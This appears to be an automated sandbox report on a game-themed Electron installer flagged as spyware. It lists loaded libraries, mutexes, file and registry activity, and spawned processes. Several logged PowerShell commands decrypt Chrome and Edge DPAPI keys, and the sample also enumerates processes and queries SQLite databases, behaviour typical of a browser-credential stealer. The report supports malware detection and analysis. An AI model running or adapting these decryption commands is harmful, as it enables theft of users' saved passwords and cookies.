Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d12core.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxilconv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3dscache.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: twinapi.appcore.dll

Uses 32bit PE files

Source: SongOfVikings.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal56.spyw.winEXE@28/110@3/3

Source: C:\Users\user\Desktop\SongOfVikings.exe

0_2_0040338F

Source: C:\Users\user\Desktop\SongOfVikings.exe

Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404722

Source: C:\Users\user\Desktop\SongOfVikings.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\SongOfVikings.exe

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Users\user\Desktop\SongOfVikings.exe	Mutant created: \Sessions\1\BaseNamedObjects\cdf7078b-99f0-53cc-bffc-b945975ddd33
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Users\user\Desktop\SongOfVikings.exe

File created: C:\Users\user\AppData\Local\Temp\nsyF296.tmp

Jump to behavior

Source: SongOfVikings.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\SongOfVikings.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';

Source: C:\Users\user\Desktop\SongOfVikings.exe

File read: C:\Users\user\Desktop\SongOfVikings.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SongOfVikings.exe "C:\Users\user\Desktop\SongOfVikings.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe"
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')

Source: C:\Users\user\Desktop\SongOfVikings.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Automated click: OK

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cdf7078b-99f0-53cc-bffc-b945975ddd33

Jump to behavior

Source: SongOfVikings.exe

Static file information: File size 84118788 > 1048576

Source: SongOfVikings.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BCC = $(NCC) -nologo -W3 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\NODE_SQLITE3.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\NODE_SQLITE3.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: del /Q .exp .lo .ilk .lib .obj .ncb .pdb .sdf *.suo 2>NUL source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp
